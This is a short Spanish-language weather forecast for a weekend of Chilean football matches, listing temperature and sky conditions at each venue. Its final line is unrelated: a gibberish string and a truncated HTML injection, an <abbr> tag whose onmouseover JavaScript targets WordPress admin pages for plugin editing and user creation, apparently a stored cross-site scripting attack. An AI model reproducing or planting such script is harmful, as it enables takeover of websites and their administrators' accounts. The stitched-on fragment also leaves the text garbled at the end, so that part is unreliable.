La quinta fecha del Campeonato de Apertura, se jugará entre los días viernes 23 y domingo 25 de agosto. Durante estos días, meteorológicamente, se presentará una alta presión fría en la zona sur del país y un núcleo frío en altura en el centro. Es por esto que las condiciones del tiempo serán las siguientes:
En Chillán, el partido entre Ñublense y Unión Española, se jugará con bajas temperaturas y algo de bruma. El humo de las chimeneas locales puede provocar una reducción en la visibilidad principalmente hacia el final del partido.
El día sábado 24, Santiago Wanderers y O´’Higgins, en La Calera jugarán con cielos parciales y grata temperatura.
En Santiago, a las 18 horas Palestino y U. Católica jugarán en el Nacional con cielos casi despejados y un ambiente frío. Más tarde, a las 20 horas, en el Bicentenario La Florida, Audax Italiano y Cobreloa jugarán con temperaturas aún más bajas, y un cielo despejado, solo 8°C al finalizar el encuentro.
El día domingo 25, en Quillota, Everton y la U. de Concepción jugarán con escasa nubosidad y unos 15°C de temperatura.
En Talcahuano, Huachipato recibirá a Colo-Colo en un frío CAP a las 15 horas. Una hora más tarde, en Talca, Rangers será local frente a Cobresal, con nubosidad parcial y entre 14°C y 10°C de temperatura.
También a las 16 horas, pero en Iquique, el local recibirá a Unión La Calera, con gratas temperaturas y cielos con escasa nubosidad.
Cerrando la fecha, en el Santa Laura, la Universidad de Chile y Antofagasta jugarán en una fría tarde santiaguina. Solo 9°C al término del partido.
hinice ectygb 🙂 <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var sh&%2